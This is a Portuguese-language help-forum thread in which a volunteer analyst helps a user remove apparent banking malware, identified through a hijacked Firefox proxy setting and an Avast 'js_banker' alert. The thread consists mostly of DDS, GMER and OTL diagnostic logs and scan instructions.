BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - c:\program files\microsoft office\office14\GROOVEEX.DLL

BHO: Java Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - c:\program files\java\jre7\bin\ssv.dll

BHO: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\google toolbar\GoogleToolbar_32.dll

BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - c:\program files\microsoft office\office14\URLREDIR.DLL

BHO: SpeedBit Link Verification Helper: {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} - c:\program files\dap\LinkVerifier.dll

BHO: Java Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre7\bin\jp2ssv.dll

TB: Google Toolbar: {2318C2B1-4965-11D4-9B18-009027A5CD4F} - c:\program files\google\google toolbar\GoogleToolbar_32.dll

TB: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\google toolbar\GoogleToolbar_32.dll

uRun: [F.lux] "c:\users\2011\local settings\apps\f.lux\flux.exe" /noshow

uRun: [swg] "c:\program files\google\googletoolbarnotifier\GoogleToolbarNotifier.exe"

uRun: [Google Update] "c:\users\2011\appdata\local\google\update\GoogleUpdate.exe" /c

mRun: [AvastUI.exe] "c:\program files\avast software\avast\AvastUI.exe" /nogui

mRun: [sunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"

mPolicies-System: ConsentPromptBehaviorAdmin = dword:5

mPolicies-System: ConsentPromptBehaviorUser = dword:3

mPolicies-System: EnableUIADesktopToggle = dword:0

IE: &Download with &DAP - c:\program files\dap\dapextie.htm

IE: &Verify with DAP - c:\program files\dap\dapverify.htm

IE: Download &all with DAP - c:\program files\dap\dapextie2.htm

IE: E&xport to Microsoft Excel - c:\progra~1\micros~2\office10\EXCEL.EXE/3000

IE: E&xportar para o Microsoft Excel - c:\progra~1\micros~2\office11\EXCEL.EXE/3000

IE: Sothink Flash Downloader For IE - c:\program files\common files\sourcetec\swf catcher\InternetExplorer.htm

IE: {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - c:\program files\common files\sourcetec\swf catcher\InternetExplorer.htm

DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab

DPF: {CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab

DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab

DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab

TCP: NameServer = 8.8.8.8 186.194.224.2 189.51.144.3 8.8.4.4

TCP: Interfaces\{A2789148-CF95-4F73-990F-5895C4E94439} : DHCPNameServer = 8.8.8.8 186.194.224.2 189.51.144.3 8.8.4.4

Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - c:\program files\common files\microsoft shared\office14\MSOXMLMF.DLL

Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\program files\common files\skype\Skype4COM.dll

Name-Space Handler: FTP\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - c:\program files\dap\dapie.dll

Name-Space Handler: HTTP\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - c:\program files\dap\dapie.dll

SSODL: WebCheck - <orphaned>

SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - c:\program files\microsoft office\office14\GROOVEEX.DLL

.

================= FIREFOX ===================

.

FF - ProfilePath - c:\users\2011\appdata\roaming\mozilla\firefox\profiles\1t2pwtzw.default\

FF - prefs.js: browser.search.selectedEngine - Google

FF - prefs.js: network.proxy.http - 189.112.117.5

FF - prefs.js: network.proxy.type - 2

FF - plugin: c:\progra~1\micros~2\office14\NPAUTHZ.DLL

FF - plugin: c:\progra~1\micros~2\office14\NPSPWRAP.DLL

FF - plugin: c:\program files\adobe\reader 10.0\reader\air\nppdf32.dll

FF - plugin: c:\program files\foxit software\foxit reader\plugins\npFoxitReaderPlugin.dll

FF - plugin: c:\program files\google\update\1.3.21.165\npGoogleUpdate3.dll

FF - plugin: c:\program files\java\jre7\bin\plugin2\npjp2.dll

FF - plugin: c:\users\2011\appdata\local\google\update\1.3.21.165\npGoogleUpdate3.dll

FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_11_8_800_168.dll

FF - plugin: c:\windows\system32\npDeployJava1.dll

FF - plugin: c:\windows\system32\npmproxy.dll

.

============= SERVICES / DRIVERS ===============

.

R0 aswRvrt;avast! Revert;c:\windows\system32\drivers\aswRvrt.sys [2013-3-3 49944]

R0 aswVmm;avast! VM Monitor;c:\windows\system32\drivers\aswVmm.sys [2013-3-3 178304]

R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [2012-8-6 774392]

R1 aswSP;aswSP;c:\windows\system32\drivers\aswsp.sys [2013-11-8 403440]

R1 dtsoftbus01;DAEMON Tools Virtual Bus Driver;c:\windows\system32\drivers\dtsoftbus01.sys [2012-9-15 242240]

R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [2012-8-6 35656]

R2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys [2012-8-6 70384]

R2 avast! Antivirus;avast! Antivirus;c:\program files\avast software\avast\AvastSvc.exe [2013-11-8 50344]

R2 svcgdp;software services;c:\program files\software plate\svcgdp.exe [2012-9-24 92800]

S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]

S2 SkypeUpdate;Skype Updater;c:\program files\skype\updater\Updater.exe [2013-6-21 162408]

S3 b57nd60x;Broadcom NetXtreme Gigabit Ethernet - NDIS 6.0;c:\windows\system32\drivers\b57nd60x.sys [2009-7-13 229888]

S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2013-4-25 14848]

S3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\TsUsbFlt.sys [2013-4-25 49664]

S4 KMService;KMService;c:\windows\system32\srvany.exe [2012-8-7 8192]

.

=============== Created Last 30 ================

.

2013-11-17 15:08:42 -------- d-----w- C:\AdwCleaner

2013-11-13 01:25:21 1796096 ----a-w- c:\windows\system32\authui.dll

2013-10-24 11:51:52 94632 ----a-w- c:\windows\system32\WindowsAccessBridge.dll

.

==================== Find3M ====================

.

2013-11-09 00:36:36 774392 ----a-w- c:\windows\system32\drivers\aswSnx.sys

2013-11-09 00:36:36 70384 ----a-w- c:\windows\system32\drivers\aswMonFlt.sys

2013-11-09 00:36:35 43152 ----a-w- c:\windows\avastSS.scr

2013-10-21 16:12:37 79720 ----a-w- c:\windows\system32\drivers\aswRdr2.sys

2013-10-21 16:12:37 49944 ----a-w- c:\windows\system32\drivers\aswRvrt.sys

2013-10-21 16:12:37 178304 ----a-w- c:\windows\system32\drivers\aswVmm.sys

2013-10-12 07:03:50 1767936 ----a-w- c:\windows\system32\wininet.dll

2013-10-12 07:02:33 2877952 ----a-w- c:\windows\system32\jscript9.dll

2013-10-12 07:02:29 61440 ----a-w- c:\windows\system32\iesetup.dll

2013-10-12 07:02:29 109056 ----a-w- c:\windows\system32\iesysprep.dll

2013-10-12 06:08:58 2706432 ----a-w- c:\windows\system32\mshtml.tlb

2013-10-12 05:15:39 71680 ----a-w- c:\windows\system32\RegisterIEPKEYs.exe

2013-10-12 02:03:08 656896 ----a-w- c:\windows\system32\nshwfp.dll

2013-10-12 02:01:41 679424 ----a-w- c:\windows\system32\IKEEXT.DLL

2013-10-12 02:01:25 216576 ----a-w- c:\windows\system32\FWPUCLNT.DLL

2013-10-09 02:56:36 71048 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl

2013-10-09 02:56:36 692616 ----a-w- c:\windows\system32\FlashPlayerApp.exe

2013-10-05 19:57:25 1168384 ----a-w- c:\windows\system32\crypt32.dll

2013-10-04 01:58:50 152576 ----a-w- c:\windows\system32\SmartcardCredentialProvider.dll

2013-10-04 01:56:25 168960 ----a-w- c:\windows\system32\credui.dll

2013-10-03 01:58:07 305152 ----a-w- c:\windows\system32\gdi32.dll

2013-09-25 02:01:08 136640 ----a-w- c:\windows\system32\drivers\ksecpkg.sys

2013-09-25 02:01:06 67520 ----a-w- c:\windows\system32\drivers\ksecdd.sys

2013-09-25 01:57:46 99840 ----a-w- c:\windows\system32\sspicli.dll

2013-09-25 01:57:26 22016 ----a-w- c:\windows\system32\secur32.dll

2013-09-25 01:57:24 247808 ----a-w- c:\windows\system32\schannel.dll

2013-09-25 01:56:42 220160 ----a-w- c:\windows\system32\ncrypt.dll

2013-09-25 01:56:02 1038848 ----a-w- c:\windows\system32\lsasrv.dll

2013-09-25 00:49:20 22016 ----a-w- c:\windows\system32\lsass.exe

2013-09-25 00:49:18 15872 ----a-w- c:\windows\system32\sspisrv.dll

2013-09-14 00:48:58 338944 ----a-w- c:\windows\system32\drivers\afd.sys

2013-09-08 02:07:12 1294272 ----a-w- c:\windows\system32\drivers\tcpip.sys

2013-09-08 02:03:58 231424 ----a-w- c:\windows\system32\mswsock.dll

2013-09-04 01:15:32 258560 ----a-w- c:\windows\system32\drivers\usbhub.sys

2013-09-04 01:14:52 76288 ----a-w- c:\windows\system32\drivers\usbccgp.sys

2013-09-04 01:14:52 284672 ----a-w- c:\windows\system32\drivers\usbport.sys

2013-09-04 01:14:45 43008 ----a-w- c:\windows\system32\drivers\usbehci.sys

2013-09-04 01:14:45 20480 ----a-w- c:\windows\system32\drivers\usbohci.sys

2013-09-04 01:14:43 24064 ----a-w- c:\windows\system32\drivers\usbuhci.sys

2013-09-04 01:14:40 6016 ----a-w- c:\windows\system32\drivers\usbd.sys

2013-08-29 01:51:45 3969472 ----a-w- c:\windows\system32\ntkrnlpa.exe

2013-08-29 01:51:45 3914176 ----a-w- c:\windows\system32\ntoskrnl.exe

2013-08-29 01:50:30 1289096 ----a-w- c:\windows\system32\ntdll.dll

2013-08-29 01:50:16 619520 ----a-w- c:\windows\system32\tdh.dll

2013-08-29 01:48:17 640512 ----a-w- c:\windows\system32\advapi32.dll

2013-08-28 01:04:30 2348544 ----a-w- c:\windows\system32\win32k.sys

2013-08-28 00:57:20 434688 ----a-w- c:\windows\system32\scavengeui.dll

2013-08-24 11:59:27 773800 ----a-w- c:\windows\system32\msvcr100.dll

2013-08-24 11:59:26 421032 ----a-w- c:\windows\system32\msvcp100.dll

.

============= FINISH: 23:14:56,93 ===============

.

UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.

IF REQUESTED, ZIP IT UP & ATTACH IT

.

DDS (Ver_2012-11-20.01)

.

Microsoft Windows 7 Ultimate

Boot Device: \Device\HarddiskVolume1

Install Date: 29/09/2011 10:03:29

System Uptime: 20/11/2013 22:49:59 (1 hours ago)

.

Motherboard: Dell Inc. | | 0WG864

Processor: Intel® Core2 CPU 6320 @ 1.86GHz | Microprocessor | 1862/1066mhz

.

==== Disk Partitions =========================

.

A: is Removable

C: is FIXED (NTFS) - 233 GiB total, 102,791 GiB free.

D: is CDROM ()

E: is CDROM ()

.

==== Disabled Device Manager Items =============

.

==== System Restore Points ===================

.

RP101: 13/11/2013 00:31:54 - Windows Update

RP102: 18/11/2013 22:51:41 - Removed Adobe Reader X (10.1.8).

.

==== Installed Programs ======================

.

Adobe Flash Player 11 ActiveX

Adobe Flash Player 11 Plugin

µTorrent

avast! Free Antivirus

BS.Player FREE

BS.Player PRO

CCleaner

CDBurnerXP

DAEMON Tools Lite

Daum PotPlayer 1.5.37776

Download Accelerator Plus (DAP)

F.lux

FormatFactory 3.1.1

Foxit Reader

Google Chrome

Google Toolbar for Internet Explorer

Google Update Helper

Java 7 Update 45

Java Auto Updater

Java 6 Update 30

JavaFX 2.1.1

K-Lite Codec Pack 9.1.0 (Full)

Microsoft .NET Framework 4 Client Profile

Microsoft Office 2010 Service Pack 1 (SP1)

Microsoft Office Access MUI (English) 2010

Microsoft Office Access Setup Metadata MUI (English) 2010

Microsoft Office Excel MUI (English) 2010

Microsoft Office Groove MUI (English) 2010

Microsoft Office InfoPath MUI (English) 2010

Microsoft Office OneNote MUI (English) 2010

Microsoft Office Outlook MUI (English) 2010

Microsoft Office PowerPoint MUI (English) 2010

Microsoft Office Professional Plus 2010

Microsoft Office Proof (English) 2010

Microsoft Office Proof (French) 2010

Microsoft Office Proof (Spanish) 2010

Microsoft Office Proofing (English) 2010

Microsoft Office Publisher MUI (English) 2010

Microsoft Office Shared MUI (English) 2010

Microsoft Office Shared Setup Metadata MUI (English) 2010

Microsoft Office Word MUI (English) 2010

Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148

Mozilla Firefox 20.0.1 (x86 pt-BR)

Mozilla Maintenance Service

PDFCreator

Quake III Arena

Samsung ML-1860 Series

Samsung Printer Live Update

Security Update for Microsoft .NET Framework 4 Client Profile (KB2604121)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2656351)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2656368v2)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2656405)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2686827)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2729449)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2737019)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2742595)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2789642)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2804576)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2835393)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2840628)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2840628v2)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2858302v2)

Skype™ 6.6

Sothink SWF Decompiler

StreamTransport version: 1.0.2.2171

Update for Microsoft .NET Framework 4 Client Profile (KB2468871)

Update for Microsoft .NET Framework 4 Client Profile (KB2533523)

Update for Microsoft .NET Framework 4 Client Profile (KB2600217)

Update for Microsoft .NET Framework 4 Client Profile (KB2836939)

Update for Microsoft .NET Framework 4 Client Profile (KB2836939v3)

VLC media player 2.0.4

Winamp

Windows Media Player Firefox Plugin

WinRAR 4.10 (32-bit)

.

==== End Of File ===========================

GMER 2.1.19163 - http://www.gmer.net

Rootkit scan 2013-11-20 23:40:36

Windows 6.1.7601 Service Pack 1 \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-1 WDC_WD25 rev.10.0 232,83GB

Running: gmer.exe; Driver: C:\Users\2011\AppData\Local\Temp\pxldipog.sys

---- System - GMER 2.1 ----

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwAddBootEntry [0x9061EB10]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwAssignProcessToJobObject [0x9061F5EE]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateEvent [0x9062B5E0]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateEventPair [0x9062B62C]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateIoCompletion [0x9062B7C6]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateMutant [0x9062B54E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateSection [0x9062B670]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateSemaphore [0x9062B596]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateThread [0x9061FB24]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateThreadEx [0x9061FD40]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateTimer [0x9062B780]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwDebugActiveProcess [0x906203DC]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwDeleteBootEntry [0x9061EB76]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwDuplicateObject [0x90623B58]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwLoadDriver [0x9061E75E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwModifyBootEntry [0x9061EBDC]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwNotifyChangeKey [0x90623F4E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwNotifyChangeMultipleKeys [0x90620E6C]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenEvent [0x9062B60A]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenEventPair [0x9062B64E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenIoCompletion [0x9062B7EA]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenMutant [0x9062B574]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenProcess [0x90623452]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenSection [0x9062B6FE]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenSemaphore [0x9062B5BE]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenThread [0x9062383A]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenTimer [0x9062B7A4]

SSDT \??\C:\Windows\system32\drivers\aswSP.sys ZwProtectVirtualMemory [0x889A50CC]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwQueryObject [0x90620D38]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwQueueApcThreadEx [0x90620A46]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSetBootEntryOrder [0x9061EC42]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSetBootOptions [0x9061ECA8]

SSDT \??\C:\Windows\system32\drivers\aswSP.sys ZwSetContextThread [0x889A5316]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSetSystemInformation [0x9061E7F8]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSetSystemPowerState [0x9061E9CE]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwShutdownSystem [0x9061E95C]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSuspendProcess [0x906205A6]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSuspendThread [0x90620708]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSystemDebugControl [0x9061EA56]

SSDT \??\C:\Windows\system32\drivers\aswSP.sys ZwTerminateProcess [0x889A5194]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwTerminateThread [0x90620236]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwVdmControl [0x9061ED0E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwWriteVirtualMemory [0x9061F64A]

---- Kernel code sections - GMER 2.1 ----

.text ntkrnlpa.exe!ZwRollbackEnlistment + 142D 82A53A15 1 Byte [06]

.text ntkrnlpa.exe!KiDispatchInterrupt + 5A2 82A8D212 19 Bytes [E0, 0F, BA, F0, 07, 73, 09, ...] {LOOPNZ 0x11; MOV EDX, 0x97307f0; MOV CR4, EAX; OR AL, 0x80; MOV CR4, EAX; RET ; MOV ECX, CR3}

.text ntkrnlpa.exe!KeRemoveQueueEx + 10CB 82A94460 4 Bytes [10, EB, 61, 90] {ADC BL, CH; POPA ; NOP }

.text ntkrnlpa.exe!KeRemoveQueueEx + 1153 82A944E8 4 Bytes [EE, F5, 61, 90] {OUT DX, AL; CMC ; POPA ; NOP }

.text ntkrnlpa.exe!KeRemoveQueueEx + 11A7 82A9453C 8 Bytes [E0, B5, 62, 90, 2C, B6, 62, ...] {LOOPNZ 0xffffffb7; BOUND EDX, [EAX-0x6f9d49d4]}

.text ntkrnlpa.exe!KeRemoveQueueEx + 11B3 82A94548 4 Bytes [C6, B7, 62, 90]

.text ntkrnlpa.exe!KeRemoveQueueEx + 11CF 82A94564 4 Bytes [4E, B5, 62, 90] {DEC ESI; MOV CH, 0x62; NOP }

.text ...

.text C:\Windows\system32\drivers\atikmdag.sys section is writeable [0x9120B000, 0x227A14, 0xE8000020]

? C:\Users\2011\AppData\Local\Temp\mbr.sys O sistema não pode encontrar o arquivo especificado. !

---- User code sections - GMER 2.1 ----

.text C:\Windows\system32\taskhost.exe[388] kernel32.dll!GetBinaryTypeW + 70 764969E4 1 Byte [62]

.text C:\Windows\system32\csrss.exe[424] kernel32.dll!GetBinaryTypeW + 70 764969E4 1 Byte [62]

.text C:\Windows\system32\wininit.exe[496] kernel32.dll!GetBinaryTypeW + 70 764969E4 1 Byte [62]

.text C:\Windows\system32\csrss.exe[508] kernel32.dll!GetBinaryTypeW + 70 764969E4 1 Byte [62]

.text C:\Windows\system32\services.exe[544] kernel32.dll!GetBinaryTypeW + 70 764969E4 1 Byte [62]

.text ...

---- Devices - GMER 2.1 ----

AttachedDevice \Driver\tdx \Device\Tcp aswTdi.sys

AttachedDevice \Driver\tdx \Device\Udp aswTdi.sys

---- EOF - GMER 2.1 ----

Compartilhar este post


Link para o post
Compartilhar em outros sites

Caro manoelvalerio

Recomendo que salve este tópico em seus Favoritos para facilitar na hora de encontrá-lo.

Por favor, atente para o seguinte:

  • Caso fique sem resposta durante 3 dias, me envie uma Mensagem Privada (MP);
  • O que será passado aqui, somente será com relação ao problema do seu computador portanto, não faça mais em nenhum outro;
  • Siga, por favor, atentamente as instruções passadas e em caso de dúvidas não hesite em perguntá-las;
  • Sempre coloque suas respostas neste tópico... Não abra outro!
  • Procure sempre me manter informado, durante a remoção, sobre o que acontece com seu computador.
  • Respeite a ordem das instruções passadas.
  • Observação: Não tome outra medida além das passadas aqui; atente para que, caso peça ajuda em outro fórum, não deixe de nos informar, sob risco de desconfigurar seu computador!

# Etapa nº 1 #

O analista diego_moicano em 15/11/13, resolveu a mesma infecção
Você tem ainda o link do tópico?

Conhece este IP: 189.112.117.5

Teria como postar o log do Avast sobre a infecção?

Abraços :D

Compartilhar este post


Link para o post
Compartilhar em outros sites

Olá Diego! O link do tópico é este: http://forum.clubedohardware.com.br/como-remover-js/1160861

--------------

Conhece este IP: 189.112.117.5

Não conheço.. o meu IPv4 é: 179.107.3.105

--------------

Não sei onde tiro o log do avast, rsrs. Só consegui dois prints do malware quando o avast pipoca na tela.

js_banker2.jpg

js_banker1.jpg

No aguardo de mais instruições. Obrigado.

Compartilhar este post


Link para o post
Compartilhar em outros sites

Caro manoelvalerio

De acordo com nossas regras você só poderia abrir um novo tópico depois de 30 dias, é um prazo que damos para atender novamente o mesmo usuário. Agora, você poderia pedir para reabrir o seu antigo tópico, pois a suspeita que o mesmo malware tenha voltado. Vamos fazer o seguinte, vi que é novo no fórum, então vamos continuar por aqui mesmo, e caso tenha um novo problema, se tratando da mesma infecção (grande detalhe), peça para reabrir o tópico ;)

Faça o donwload do OTL by OldTimer e salve em seu Desktop.

  • Clique duas vezes no ícone 3984478580_7ed4cabc45_o.gif
  • Deixe a tela principal configurada conforme figura abaixo:

5369448421_6bf795eb1a_b.jpg

  • Copie e cole o conteúdo abaixo, no espaço logo após 5369460409_ee749edc8e_m.jpg
netsvcs
msconfig
safebootminimal
safebootnetwork
activex
drivers32
/md5start
eventlog.dll
scecli.dll
netlogon.dll
cngaudit.dll
sceclt.dll
ntelogon.dll
logevent.dl
iaStor.sys
nvstor.sys
atapi.sys
IdeChnDr.sys
viasraid.sys
/md5stop

  • Clique no botão 5370056362_e3d07d5d8a_m.jpg
  • Não interrompa o scan em hipótese alguma;
  • Quando terminar será gerado dois logs: OTL.txt e Extras.txt;
  • Reinicie o computador;
  • Poste os dois logs em sua próxima resposta.
  • Não exclua o OTL

Abraços :D

Compartilhar este post


Link para o post
Compartilhar em outros sites

De acordo com nossas regras você só poderia abrir um novo tópico depois de 30 dias, é um prazo que damos para atender novamente o mesmo usuário.

----------

Bom dia Diego! Eu não abri um novo tópico não, nunca fui atendido pelos analista aqui do CDH, só imaginei que a mesma solução adotada para outro usuário aqui do fórum serviria para o meu caso =]

Assim que chegar em casa eu posto os logs solicitados.

Grato pela atenção.

Abraço!

Compartilhar este post


Link para o post
Compartilhar em outros sites
Bom dia Diego! Eu não abri um novo tópico não, nunca fui atendido pelos analista aqui do CDH, só imaginei que a mesma solução adotada para outro usuário aqui do fórum serviria para o meu caso =]
Tem razão, peço desculpas pela confusão ;)

Aguardo os logs :)

Compartilhar este post


Link para o post
Compartilhar em outros sites

Bom dia Diego!

Seguem os logs.

Grato pela atenção!

OTL logfile created on: 30/11/2013 11:25:47 - Run 1

OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\2011\Desktop

Ultimate Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation

Internet Explorer (Version = 9.10.9200.16736)

Locale: 00000416 | Country: Brasil | Language: PTB | Date Format: dd/MM/yyyy

2,00 Gb Total Physical Memory | 1,51 Gb Available Physical Memory | 75,56% Memory free

4,00 Gb Paging File | 3,35 Gb Available in Paging File | 83,81% Paging File free

Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files

Drive C: | 232,73 Gb Total Space | 106,05 Gb Free Space | 45,57% Space Free | Partition Type: NTFS

Computer Name: 2011_PC | User Name: 2011 | Logged in as Administrator.

Boot Mode: Normal | Scan Mode: All users

Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2013/11/30 11:23:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\2011\Desktop\OTL.exe

PRC - [2013/11/08 22:36:33 | 003,568,312 | ---- | M] (AVAST Software) -- C:\Arquivos de Programas\AVAST Software\Avast\AvastUI.exe

PRC - [2013/11/08 22:36:32 | 000,050,344 | ---- | M] (AVAST Software) -- C:\Arquivos de Programas\AVAST Software\Avast\AvastSvc.exe

PRC - [2013/03/15 04:03:42 | 000,222,208 | ---- | M] (Microsoft Corporation) -- C:\Arquivos de Programas\Internet Explorer\ielowutil.exe

PRC - [2012/11/23 00:48:41 | 000,049,152 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\taskhost.exe

PRC - [2012/09/24 12:26:30 | 000,092,800 | ---- | M] (Beijing Xing Technology Co., Ltd.) -- C:\Arquivos de Programas\Software Plate\svcgdp.exe

PRC - [2011/02/25 03:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe

PRC - [2010/11/20 10:17:56 | 001,121,792 | ---- | M] (Microsoft Corporation) -- C:\Arquivos de Programas\Windows Media Player\wmpnetwk.exe

PRC - [2009/08/29 04:00:12 | 000,966,656 | ---- | M] () -- C:\Users\2011\Local Settings\Apps\F.lux\flux.exe

========== Modules (No Company Name) ==========

MOD - [2013/10/21 14:12:35 | 019,336,120 | ---- | M] () -- C:\Arquivos de Programas\AVAST Software\Avast\libcef.dll

MOD - [2011/03/17 00:11:16 | 004,297,568 | ---- | M] () -- C:\Arquivos de Programas\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF

MOD - [2010/10/20 15:45:26 | 008,801,120 | ---- | M] () -- C:\Arquivos de Programas\Microsoft Office\Office14\1033\GrooveIntlResource.dll

MOD - [2009/08/29 04:00:12 | 000,966,656 | ---- | M] () -- C:\Users\2011\Local Settings\Apps\F.lux\flux.exe

========== Services (SafeList) ==========

SRV - [2013/11/08 22:36:32 | 000,050,344 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Arquivos de Programas\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)

SRV - [2013/10/09 00:56:37 | 000,257,416 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)

SRV - [2013/10/05 22:41:26 | 000,115,608 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)

SRV - [2013/06/21 11:57:12 | 000,162,408 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Arquivos de Programas\Skype\Updater\Updater.exe -- (SkypeUpdate)

SRV - [2013/05/27 02:57:27 | 000,680,960 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Windows Defender\MpSvc.dll -- (WinDefend)

SRV - [2012/09/24 12:26:30 | 000,092,800 | ---- | M] (Beijing Xing Technology Co., Ltd.) [Auto | Running] -- C:\Arquivos de Programas\Software Plate\svcgdp.exe -- (svcgdp)

SRV - [2010/12/27 23:50:30 | 031,124,344 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Office\Office14\GROOVE.EXE -- (Microsoft SharePoint Workspace Audit Service)

SRV - [2010/11/20 10:17:56 | 001,121,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Arquivos de Programas\Windows Media Player\wmpnetwk.exe -- (WMPNetworkSvc)

